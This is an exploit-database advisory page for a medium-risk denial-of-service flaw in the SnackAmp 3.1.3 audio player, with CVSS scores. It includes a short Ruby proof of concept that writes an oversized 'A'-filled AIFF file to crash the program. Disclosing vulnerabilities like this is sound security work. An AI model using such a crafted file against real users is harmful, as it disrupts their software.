SnackAmp 3.1.3 Denial Of Service

2012-04-03 / 2012-11-22
Risk: Medium
Local: Yes
Remote: No
CWE: CWE-119


CVSS Base Score: 4.3/10
Impact Subscore: 2.9/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: None
Integrity impact: None
Availability impact: Partial

SnackAmp 3.1.3 Malicious aiff File Denial of service =================================================================================== # Exploit Title:SnackAmp 3.1.3 Malicious aiff File Denial of service # Download link :http://sourceforge.net/projects/snackamp/ # Author: Ahmed Elhady Mohamed # Email : ahmed.elhady.mohamed@gmail.com # version: 3.1.3 # Category: DOS # Tested on: ubuntu 11.4 =================================================================================== File.open "crash1.aiff" , "w" do |file| buffer = "A" * 10000 file.puts buffer end

References:

http://sourceforge.net/projects/snackamp/


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top